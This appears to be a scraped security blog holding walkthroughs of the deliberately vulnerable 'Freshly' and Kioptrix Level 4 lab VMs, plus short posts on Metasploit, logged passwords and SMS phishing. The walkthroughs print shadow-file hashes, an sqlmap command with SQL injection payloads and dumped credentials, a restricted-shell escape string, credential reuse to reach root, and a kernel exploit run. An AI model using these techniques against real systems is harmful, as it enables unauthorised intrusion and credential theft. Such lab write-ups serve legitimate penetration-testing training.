backup:x:34:34:backup:/var/backups:/usr/sbin/nologin<br />
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin<br />
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin<br />
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin<br />
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin<br />
libuuid:x:100:101::/var/lib/libuuid:<br />
syslog:x:101:104::/home/syslog:/bin/false<br />
messagebus:x:102:105::/var/run/dbus:/bin/false<br />
user:x:1000:1000:user,,,:/home/user:/bin/bash<br />
mysql:x:103:111:MySQL Server,,,:/nonexistent:/bin/false<br />
candycane:x:1001:1001::/home/candycane:<br />
# YOU STOLE MY SECRET FILE!<br />
# SECRET = "NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!"<br />
daemon@Freshly:/$ cat /etc/shadow<br />
cat /etc/shadow<br />
root:$6$If.Y9A3d$L1/qOTmhdbImaWb40Wit6A/wP5tY5Ia0LB9HvZvl1xAGFKGP5hm9aqwvFtDIRKJaWkN8cuqF6wMvjl1gxtoR7/:16483:0:99999:7:::<br />
daemon:*:16483:0:99999:7:::<br />
bin:*:16483:0:99999:7:::<br />
sys:*:16483:0:99999:7:::<br />
sync:*:16483:0:99999:7:::<br />
games:*:16483:0:99999:7:::<br />
man:*:16483:0:99999:7:::<br />
lp:*:16483:0:99999:7:::<br />
mail:*:16483:0:99999:7:::<br />
news:*:16483:0:99999:7:::<br />
uucp:*:16483:0:99999:7:::<br />
proxy:*:16483:0:99999:7:::<br />
www-data:*:16483:0:99999:7:::<br />
backup:*:16483:0:99999:7:::<br />
list:*:16483:0:99999:7:::<br />
irc:*:16483:0:99999:7:::<br />
gnats:*:16483:0:99999:7:::<br />
nobody:*:16483:0:99999:7:::<br />
libuuid:!:16483:0:99999:7:::<br />
syslog:*:16483:0:99999:7:::<br />
messagebus:*:16483:0:99999:7:::<br />
user:$6$MuqQZq4i$t/lNztnPTqUCvKeO/vvHd9nVe3yRoES5fEguxxHnOf3jR/zUl0SFs825OM4MuCWlV7H/k2QCKiZ3zso.31Kk31:16483:0:99999:7:::<br />
mysql:!:16483:0:99999:7:::<br />
candycane:$6$gfTgfe6A$pAMHjwh3aQV1lFXtuNDZVYyEqxLWd957MSFvPiPaP5ioh7tPOwK2TxsexorYiB0zTiQWaaBxwOCTRCIVykhRa/:16483:0:99999:7:::<br />
# YOU STOLE MY PASSWORD FILE!<br />
# SECRET = "NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!"<br />
daemon@Freshly:/$ </div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
___________________________________________________________________</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
This was probably enough to satisfy the requirements of the Challenge, but I continued. </div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
I ran John against the password hashes using my favorite wordlist:</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnoxudIKEcaCJtTK8qrALD6DvrRiyFoo86suPV0P4s1HBpab0k1Dkc4qK4GZmD9Ont6GEDMgWVxQNnE-tvpHoal8XZMzX55uUHxicCGE7lFXA4FgTsbr_wO7gz2vSi98sYuZF4JVgEgGB0/s1600/Screenshot+from+2015-05-27+00%253A28%253A16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="52" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnoxudIKEcaCJtTK8qrALD6DvrRiyFoo86suPV0P4s1HBpab0k1Dkc4qK4GZmD9Ont6GEDMgWVxQNnE-tvpHoal8XZMzX55uUHxicCGE7lFXA4FgTsbr_wO7gz2vSi98sYuZF4JVgEgGB0/s400/Screenshot+from+2015-05-27+00%253A28%253A16.png" width="400" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
I probably didn't have to but I login as the cracked user "candycane"</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Running an enumeration script, I found that the login.php file had database credentials hard coded in it:</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<b>candycane@Freshly:/var/www/html$ cat login.php<br />
cat login.php<br />
mysql_connect('localhost','root','SuperSecretPassword');<br />
mysql_select_db('login');<br />
?></b></div>
<b><br /></b>
Same password as wordpress, nobody does that, yeah right...<br />
<br />
So I logged in as the DB root user with these credentials and enumerated a bit more:<br />
<br />
<br />
candycane@Freshly:/var/www/html$ mysql --user=root --password=SuperSecretPassword wordpress8080<br />
d wordpress8080ot --password=SuperSecretPasswor <br />
Reading table information for completion of table and column names<br />
You can turn off this feature to get a quicker startup with -A<br />
<br />
Welcome to the MySQL monitor. Commands end with ; or \g.<br />
Your MySQL connection id is 4886<br />
Server version: 5.5.41-0ubuntu0.14.04.1 (Ubuntu)<br />
<br />
Copyright (c) 2000, 2014, Oracle and/or its affiliates. All rights reserved.<br />
<br />
Oracle is a registered trademark of Oracle Corporation and/or its<br />
affiliates. Other names may be trademarks of their respective<br />
owners.<br />
<br />
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.<br />
<br />
mysql> <br />
<br />
<br />
mysql> show databases;<br />
show databases;<br />
+--------------------+<br />
| Database |<br />
+--------------------+<br />
| information_schema |<br />
| login |<br />
| mysql |<br />
| performance_schema |<br />
| phpmyadmin |<br />
| users |<br />
| wordpress8080 |<br />
+--------------------+<br />
7 rows in set (0.00 sec)<br />
<br />
mysql> show tables from login;<br />
show tables from login;<br />
+-----------------+<br />
| Tables_in_login |<br />
+-----------------+<br />
| user_name |<br />
| users |<br />
+-----------------+<br />
2 rows in set (0.00 sec)<br />
<br />
mysql> use login;<br />
use login;<br />
Reading table information for completion of table and column names<br />
You can turn off this feature to get a quicker startup with -A<br />
<br />
Database changed<br />
mysql> select * from users;<br />
select * from users;<br />
+-----------+----------+<br />
| user_name | password |<br />
+-----------+----------+<br />
| candyshop | password |<br />
| Sir | PopRocks |<br />
+-----------+----------+<br />
2 rows in set (0.00 sec)<br />
<br />
mysql><br />
<br />
______________________________________________________________________________<br />
<br />
<br />
So this yielded a little more information. I chose not to continue enumerating and decided to try to use the same reused password for the root account and bingo!<br />
<br />
I pwned the box:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUAJAmVYNBesHUFceL83f7t1R0LR_USqfAiNOj9axykqzvbV8yJ6sDBY_3XI2o2bbjftCe1LhYwIZ3T3UsIyhdhlmm3dMY_nisA_WqKYRMhAKL3wTqzMVzkg7dm2lARrnzzLtIazAW_C4E/s1600/Screenshot+from+2015-05-27+00%253A43%253A29.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="98" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUAJAmVYNBesHUFceL83f7t1R0LR_USqfAiNOj9axykqzvbV8yJ6sDBY_3XI2o2bbjftCe1LhYwIZ3T3UsIyhdhlmm3dMY_nisA_WqKYRMhAKL3wTqzMVzkg7dm2lARrnzzLtIazAW_C4E/s400/Screenshot+from+2015-05-27+00%253A43%253A29.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Overall, I enjoyed this VM challenge do to its realism. Some challenges are fun and thought provoking, but I enjoy the ones that mimic real-world systems and human mistakes. Thanks to the guys at <a href="http://www.top-hat-sec.com/" target="_blank">Top-Hat-Sec</a>.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Court Graham, CISSP, OSCP, CEH, PCI-QSA, ITIL </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br /></div>
Court Graham, CISSP, OSCP, C|EH, PCI-QSA, ITILhttp://www.blogger.com/profile/12137980462590589771noreply@blogger.com0tag:blogger.com,1999:blog-4508217951330976703.post-84864072316435942692015-05-22T12:18:00.001-04:002015-05-22T12:18:30.422-04:00Kioptrix Level 4 Walkthough<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<br /></div>
This is the first in a long series of Vulnerable Virtual Machine Walkthroughs that I'll be posting to this site.By looking at the date of my last post, one would assume that I've gone dormant, but that's definitely not the case. So with out further a due, I bring you Kioptrix Level 4.<br />
<br />
<b>Enumeration</b><br />
<b><br /></b>
root@kali:~# nmap 10.1.1.10<br />
Starting Nmap 6.47 ( http://nmap.org ) at 2015-05-21 09:05 EDT<br />Nmap scan report for 10.1.1.10<br />
Host is up (0.00032s latency).<br />
Not shown: 566 closed ports, 430 filtered ports<br />
PORT STATE SERVICE<br />
22/tcp open ssh<br />
80/tcp open http<br />
139/tcp open netbios-ssn<br />
445/tcp open microsoft-ds<br />
MAC Address: 08:00:27:C2:50:41 (Cadmus Computer Systems)<br />
<br /><br />
Nmap done: 19 IP addresses (3 hosts up) scanned in 9.10 seconds<br />
root@kali:~#<br />
<br />
<br />
<b>Visiting the webpage on port 80 revealed a login page which may be vulnerable to some sql injection:</b><br />
<div class="separator" style="clear: both; text-align: center;">
<b><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPi96JMo0PegEVHCc4RjybY7UK153Ycq7xDSrMaKZT2E1R3GYWMqAjpMfqLyKlgPHRzq9yXRnChFLK0id7ZvoKpZ_ELyAx11mNSNPyseUZ0HiZFTlvy9Ou1DwGGxWhKqgvq3Uu1_KAkbSQ/s1600/Screenshot+from+2015-05-21+09%253A37%253A28.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="162" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPi96JMo0PegEVHCc4RjybY7UK153Ycq7xDSrMaKZT2E1R3GYWMqAjpMfqLyKlgPHRzq9yXRnChFLK0id7ZvoKpZ_ELyAx11mNSNPyseUZ0HiZFTlvy9Ou1DwGGxWhKqgvq3Uu1_KAkbSQ/s320/Screenshot+from+2015-05-21+09%253A37%253A28.png" width="320" /></a></b></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<b>Using a bunch of the usual combinations, I was able to provoke the site into revealing the underlying dbms (MYSQL)</b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4wOUE4WWvWl5eWie5zMw2wZo0Fo8UC2FH0hLMYSwYqzdshxUHTJWLAmgzlccPu_IysVkAlSmLB6MVaWlcGVNkxtEuTCHgiKa5mrGa87xnrlQG_D46xiaP0X6Ua4Vk5Z2b3g-lFnT07kDN/s1600/Screenshot+from+2015-05-21+09%253A43%253A46.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4wOUE4WWvWl5eWie5zMw2wZo0Fo8UC2FH0hLMYSwYqzdshxUHTJWLAmgzlccPu_IysVkAlSmLB6MVaWlcGVNkxtEuTCHgiKa5mrGa87xnrlQG_D46xiaP0X6Ua4Vk5Z2b3g-lFnT07kDN/s320/Screenshot+from+2015-05-21+09%253A43%253A46.png" /></a></div>
<b>With this information I was able to specify the dmbs within my use of sqlmap</b>
<b>Sqlmap output</b><br />
<b><br /></b>
root@kali:~# sqlmap -u "http://10.1.1.10/checklogin.php" --dbms=MySQL --level=5 --risk=3 --data="myusername=admin&mypassword=test" --dump<br />
sqlmap/1.0-dev - automatic SQL injection and database takeover tool<br />
http://sqlmap.org<br />
<br />
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program<br />
<br />
[*] starting at 09:14:03<br />
<br />
[09:14:03] [INFO] testing connection to the target URL<br />
[09:14:04] [INFO] heuristics detected web page charset 'ascii'<br />
[09:14:04] [INFO] testing if the target URL is stable. This can take a couple of seconds<br />
[09:14:05] [INFO] target URL is stable<br />
[09:14:05] [INFO] testing if POST parameter 'myusername' is dynamic<br />
[09:14:05] [WARNING] POST parameter 'myusername' does not appear dynamic<br />
[09:14:05] [WARNING] heuristic (basic) test shows that POST parameter 'myusername' might not be injectable<br />
[09:14:05] [INFO] testing for SQL injection on POST parameter 'myusername'<br />
[09:14:05] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'<br />
[09:14:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'<br />
[09:14:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)'<br />
[09:14:07] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'<br />
[09:14:08] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'<br />
[09:14:08] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Generic comment)'<br />
[09:14:09] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)'<br />
[09:14:10] [INFO] testing 'Generic boolean-based blind - Parameter replace (original value)'<br />
[09:14:10] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'<br />
[09:14:10] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'<br />
[09:14:10] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'<br />
[09:14:10] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'<br />
[09:14:10] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (original value)'<br />
[09:14:10] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses'<br />
[09:14:10] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value)'<br />
[09:14:10] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'<br />
[09:14:10] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'<br />
[09:14:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'<br />
[09:14:10] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'<br />
[09:14:10] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'<br />
[09:14:11] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'<br />
[09:14:11] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'<br />
[09:14:11] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)'<br />
[09:14:12] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)'<br />
<b>Blah, blah,blah...................blah...........Ultimately revealing usernames and passwords with in the underlying database</b><br />
Place: POST<br />
Parameter: mypassword<br />
Type: boolean-based blind<br />
Title: OR boolean-based blind - WHERE or HAVING clause<br />
Payload: myusername=admin&mypassword=-4827' OR (7207=7207) AND 'wyxA'='wyxA<br />
<br />
Type: AND/OR time-based blind<br />
Title: MySQL < 5.0.12 AND time-based blind (heavy query)<br />
Payload: myusername=admin&mypassword=test' AND 8831=BENCHMARK(5000000,MD5(0x46556262)) AND 'KxNZ'='KxNZ<br />
---<br />
[09:16:14] [INFO] testing MySQL<br />
[09:16:14] [INFO] confirming MySQL<br />
[09:16:14] [INFO] the back-end DBMS is MySQL<br />
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)<br />
web application technology: PHP 5.2.4, Apache 2.2.8<br />
back-end DBMS: MySQL >= 5.0.0<br />
[09:16:14] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries<br />
[09:16:14] [INFO] fetching current database<br />
[09:16:14] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval<br />
[09:16:14] [INFO] retrieved: members<br />
[09:16:15] [INFO] fetching tables for database: 'members'<br />
[09:16:15] [INFO] fetching number of tables for database 'members'<br />
[09:16:15] [INFO] retrieved: 1<br />
[09:16:15] [INFO] retrieved: members<br />
[09:16:15] [INFO] fetching columns for table 'members' in database 'members'<br />
[09:16:15] [INFO] retrieved: 3<br />
[09:16:15] [INFO] retrieved: id<br />
[09:16:16] [INFO] retrieved: username<br />
[09:16:16] [INFO] retrieved: password<br />
[09:16:17] [INFO] fetching entries for table 'members' in database 'members'<br />
[09:16:17] [INFO] fetching number of entries for table 'members' in database 'members'<br />
[09:16:17] [INFO] retrieved: 2<br />
[09:16:17] [INFO] retrieved: 1<br />
[09:16:17] [INFO] retrieved: MyNameIsJohn<br />
[09:16:18] [INFO] retrieved: john<br />
[09:16:18] [INFO] retrieved: 2<br />
[09:16:19] [INFO] retrieved: ADGAdsafdfwt4gadfga==<br />
[09:16:20] [INFO] retrieved: robert<br />
[09:16:21] [INFO] analyzing table dump for possible password hashes<br />
Database: members<br />
Table: members<br />
[2 entries]<br />
+----+----------+-----------------------+<br />
| id | username | password |<br />
+----+----------+-----------------------+<br />
| 1 | john | MyNameIsJohn |<br />
| 2 | robert | ADGAdsafdfwt4gadfga== |<br />
+----+----------+-----------------------+<br />
<br />
[09:16:21] [INFO] table 'members.members' dumped to CSV file '/usr/share/sqlmap/output/10.1.1.10/dump/members/members.csv'<br />
[09:16:21] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/10.1.1.10'<br />
<br />
[*] shutting down at 09:16:21<br />
<br />
root@kali:~#<br />
<b><br /></b>
<b><br /></b>
<b>Now lets attempt to ssh in with john's credentials</b><br />
<b><br /></b>
root@kali:~# ssh john@10.1.1.10<br />
The authenticity of host '10.1.1.10 (10.1.1.10)' can't be established.<br />
RSA key fingerprint is 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e.<br />
Are you sure you want to continue connecting (yes/no)? yes<br />
Warning: Permanently added '10.1.1.10' (RSA) to the list of known hosts.<br />
john@10.1.1.10's password: <br />
Connection closed by 10.1.1.10<br />
root@kali:~# ssh john@10.1.1.10<br />
john@10.1.1.10's password: <br />
Welcome to LigGoat Security Systems - We are Watching<br />
== Welcome LigGoat Employee ==<br />
LigGoat Shell is in place so you don't screw up<br />
Type '?' or 'help' to get the list of allowed commands<br />
john:~$ ?<br />
cd clear echo exit help ll lpath ls<br />
<br />
<b>Awesome, the credentials worked but now we're trapped in a stupid shell..... how do we escape?</b><br />
<b><br /></b>
Research on how to escape this shell lead me to the following webpage:<br />
<a href="https://www.blogger.com/goog_2125679090"><br /></a>
<a href="http://www.aldeid.com/wiki/Lshell">http://www.aldeid.com/wiki/Lshell</a><br />
<br />
<b>Worked like a charm!</b><br />
<br />
john:~$ echo os.system('/bin/bash')<br />
john@Kioptrix4:~$<br />
<br />
<br />
john@Kioptrix4:~$ uname -a<br />
Linux Kioptrix4 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux<br />
<br />
<b>Now time to take a look around and escalate privilege , looks like this Linux Kernel is vulnerable to some of the old favorites.</b><br />
<b><br /></b>
john@Kioptrix4:~$ cat /etc/sudoers<br />
cat: /etc/sudoers: Permission denied<br />
john@Kioptrix4:~$ cat /etc/passwd<br />
root:x:0:0:root:/root:/bin/bash<br />
daemon:x:1:1:daemon:/usr/sbin:/bin/sh<br />
bin:x:2:2:bin:/bin:/bin/sh<br />
sys:x:3:3:sys:/dev:/bin/sh<br />
sync:x:4:65534:sync:/bin:/bin/sync<br />
games:x:5:60:games:/usr/games:/bin/sh<br />
man:x:6:12:man:/var/cache/man:/bin/sh<br />
lp:x:7:7:lp:/var/spool/lpd:/bin/sh<br />
mail:x:8:8:mail:/var/mail:/bin/sh<br />
news:x:9:9:news:/var/spool/news:/bin/sh<br />
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh<br />
proxy:x:13:13:proxy:/bin:/bin/sh<br />
www-data:x:33:33:www-data:/var/www:/bin/sh<br />
backup:x:34:34:backup:/var/backups:/bin/sh<br />
list:x:38:38:Mailing List Manager:/var/list:/bin/sh<br />
irc:x:39:39:ircd:/var/run/ircd:/bin/sh<br />
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh<br />
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh<br />
libuuid:x:100:101::/var/lib/libuuid:/bin/sh<br />
dhcp:x:101:102::/nonexistent:/bin/false<br />
syslog:x:102:103::/home/syslog:/bin/false<br />
klog:x:103:104::/home/klog:/bin/false<br />
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false<br />
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin<br />
loneferret:x:1000:1000:loneferret,,,:/home/loneferret:/bin/bash<br />
john:x:1001:1001:,,,:/home/john:/bin/kshell<br />
robert:x:1002:1002:,,,:/home/robert:/bin/kshell<br />
john@Kioptrix4:~$ pwd<br />
/home/john<br />
john@Kioptrix4:~$ ls<br />
john@Kioptrix4:~$ cd ..<br />
john@Kioptrix4:/home$ ls<br />
john loneferret robert<br />
john@Kioptrix4:/home$ cd loneferret<br />
john@Kioptrix4:/home/loneferret$ ls<br />
john@Kioptrix4:/home/loneferret$ ls -al<br />
total 44<br />
drwxr-xr-x 2 loneferret loneferret 4096 2012-02-06 16:38 .<br />
drwxr-xr-x 5 root root 4096 2012-02-04 18:05 ..<br />
-rw------- 1 loneferret loneferret 62 2012-02-06 20:24 .bash_history<br />
-rw-r--r-- 1 loneferret loneferret 220 2012-02-04 09:58 .bash_logout<br />
-rw-r--r-- 1 loneferret loneferret 2940 2012-02-04 09:58 .bashrc<br />
-rw-r--r-- 1 loneferret loneferret 1 2012-02-05 10:37 .lhistory<br />
-rw------- 1 root root 68 2012-02-04 10:05 .my.cnf.5086<br />
-rw------- 1 root root 1 2012-02-04 10:05 .mysql.5086<br />
-rw------- 1 loneferret loneferret 1 2012-02-05 10:38 .mysql_history<br />
-rw------- 1 loneferret loneferret 9 2012-02-06 16:39 .nano_history<br />
-rw-r--r-- 1 loneferret loneferret 586 2012-02-04 09:58 .profile<br />
-rw-r--r-- 1 loneferret loneferret 0 2012-02-04 10:01 .sudo_as_admin_successful<br />
john@Kioptrix4:/home/loneferret$ more .sudo_as_admin_successful <br />
john@Kioptrix4:/home/loneferret$ more .bash_history <br />
.bash_history: Permission denied<br /><br /><b>As you can see I came across lots of interesting things including mysql and nice stuff in user directories, but it was my old faithful Linux Sendpage exploit which brought home the bacon.</b><br /><br /><br />
john@Kioptrix4:~$ ./sendpage <br />
#<br />
<br />
<br />
<br />
<br />
<br />
<br /></div>
Court Graham, CISSP, OSCP, C|EH, PCI-QSA, ITILhttp://www.blogger.com/profile/12137980462590589771noreply@blogger.com0tag:blogger.com,1999:blog-4508217951330976703.post-62609493610274659262009-10-27T00:17:00.000-04:002009-10-27T00:26:40.880-04:00What will happen to Metasploit??With Rapid7's acquisition of the Open Source Pentest tool Metasploit Framework (http://www.metasploit.com)last week. I can't help but as the question; What will happen to it? The folks at Rapid7 assure that the tool will remain free, and will likely improve due to the internal collaboration. I think that they are wanting to find away to creep up on Core Impact (http://www.coresecurity.com), the incredible, but expensive automated pentesting tool. Metasploit has served as a great free option for those who care to spend the time.<br /><br />What's next; time will only tell...Court Graham, CISSP, OSCP, C|EH, PCI-QSA, ITILhttp://www.blogger.com/profile/12137980462590589771noreply@blogger.com0tag:blogger.com,1999:blog-4508217951330976703.post-11978413005907176792009-10-21T12:44:00.000-04:002009-10-21T13:28:13.555-04:00Passwords in Log Files<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6AzE1iXkXt-UdCBddbO2iPrUk5nGpSa5fMinF0zQktm3OFaRDfncQL0baUEpAYDUvGezBEG4io6V3gh0IBUUZW4bD9ebVRV7ICpL6zPZaF2XJ-Zx5Lm083uDf8O6cm8rSwDi9vrvdrjdO/s1600-h/screen.bmp"><img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 320px; height: 196px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6AzE1iXkXt-UdCBddbO2iPrUk5nGpSa5fMinF0zQktm3OFaRDfncQL0baUEpAYDUvGezBEG4io6V3gh0IBUUZW4bD9ebVRV7ICpL6zPZaF2XJ-Zx5Lm083uDf8O6cm8rSwDi9vrvdrjdO/s320/screen.bmp" border="0" alt=""id="BLOGGER_PHOTO_ID_5395106310519999202" /></a><br /><br /><br />Protect access to your log files. Time and time again, I've conducted penetration test and have gained access to authentication logs on some box along the way. Often times, somewhere in the numerous entries, you'll find someone who has mistakenly entered their password as their username. <br /><br /><br /><br />Take that user/password gain access to other systems. There is no telling where it can take you.Court Graham, CISSP, OSCP, C|EH, PCI-QSA, ITILhttp://www.blogger.com/profile/12137980462590589771noreply@blogger.com0tag:blogger.com,1999:blog-4508217951330976703.post-6233680723032518802009-10-20T00:15:00.000-04:002009-10-20T00:39:16.429-04:00The President on Cyber SecurityThe President brings attention to the threats of Infomation Warfare and Cyber Crime. Its a good day to be a security professional. <br /><br /><br /><object width="560" height="340"><param name="movie" value="http://www.youtube.com/v/wjfzyj4eyQM&hl=en&fs=1&"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/wjfzyj4eyQM&hl=en&fs=1&" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="560" height="340"></embed></object>Court Graham, CISSP, OSCP, C|EH, PCI-QSA, ITILhttp://www.blogger.com/profile/12137980462590589771noreply@blogger.com0tag:blogger.com,1999:blog-4508217951330976703.post-528453722764456762009-04-04T22:19:00.000-04:002009-04-04T22:39:31.571-04:00Hurry up and Wait!This week was all about Confiker. I'm actually pretty appreciative of the attention this worm commanded. The best of both worlds for Information Security practitioners; widespread publicity grabbing the attention of company executives, sysadmins, and the average Joe, but not actually bring down the universe. But what now, nobody knows. What I do know is this event educated many people who otherwise had no idea of the implications of unpatched systems, lack of antivirus and the power of worms and Botnets. Hopefully everyone will be more prepared for whats next.Court Graham, CISSP, OSCP, C|EH, PCI-QSA, ITILhttp://www.blogger.com/profile/12137980462590589771noreply@blogger.com0tag:blogger.com,1999:blog-4508217951330976703.post-63647663175595593972009-02-28T23:35:00.000-05:002009-03-01T00:04:54.487-05:00Phishing for USE Credit Union Members<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCzb8MZwQJYljuChPSa6zoLpHegAjL5c5CVESZDVUPBhk7Bnh31gFtddULTlVp_BWwxOtwOJsxcPwmLI-cTJbITmX7kqIOl5Glh5uJfSObZSIheLkrJs_KuIRcuaBwcawfnZqw3Z98JKz9/s1600-h/Phone.jpg"><img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 320px; height: 240px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCzb8MZwQJYljuChPSa6zoLpHegAjL5c5CVESZDVUPBhk7Bnh31gFtddULTlVp_BWwxOtwOJsxcPwmLI-cTJbITmX7kqIOl5Glh5uJfSObZSIheLkrJs_KuIRcuaBwcawfnZqw3Z98JKz9/s320/Phone.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5308074442855645330" /></a><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilcZdjkTNRzxfWdAb4iY599LUP_qDjuYZSxqaSjh_Z6KEIKjHGdeK52izKhUI9SrgBDwN9Rd5WlkwxbXkIVZZitSmvizToHrrj0OJfzEJxPvbkG7CD-Nu2ZXIccu6CvXGL3YJkF5vJbbIw/s1600-h/Site.png"><img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 320px; height: 245px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilcZdjkTNRzxfWdAb4iY599LUP_qDjuYZSxqaSjh_Z6KEIKjHGdeK52izKhUI9SrgBDwN9Rd5WlkwxbXkIVZZitSmvizToHrrj0OJfzEJxPvbkG7CD-Nu2ZXIccu6CvXGL3YJkF5vJbbIw/s320/Site.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5308075404209083410" /></a><br />As promised here is my next post already. Couldn't have been 30 minutes ago when I promised that I would keep them coming. This post involves cell phone phishing scams. lately I've received text messages from what appears to be USE Credit Union. <br /><br />The text message alerts the recipient of Unauthorized Identity Access then directs them to visit a fraudulent website which requires entry of credit/debit card information. Text book lack of an SSL Connection,privacy warnings displayed in the browser,etc.<br />Viewing the source of the page revealed a well comment application for customized credit card theft...<br /><br />This time it was phishing next time could easily be a targeted attack with malicious code dropping a back door.Court Graham, CISSP, OSCP, C|EH, PCI-QSA, ITILhttp://www.blogger.com/profile/12137980462590589771noreply@blogger.com0tag:blogger.com,1999:blog-4508217951330976703.post-73086086689718017532009-02-28T22:59:00.000-05:002009-02-28T23:15:37.050-05:00Its been a whole yearI've got to post more often.. It was never my intention to do a post a year, LoL. Its been an interesting year and I have encountered many new exciting challenges in my career in Information Security. I have added the interest & responsibilities of managing enterprise level security to my daily concerns. Just a year ago, exploits, malware, firewall rule sets and IPS tunning dominated my duties. Now I've added Metrics, Dashboards, Average Loss Expectancies, Risk Assessments and regulatory requirements. I guess I'll count it as gaining maturity as a security professional. With that said, there is no excuse... Not only do I need to post more often, it now seems to be psychological necessity.. <br /><br /><br />More to comeCourt Graham, CISSP, OSCP, C|EH, PCI-QSA, 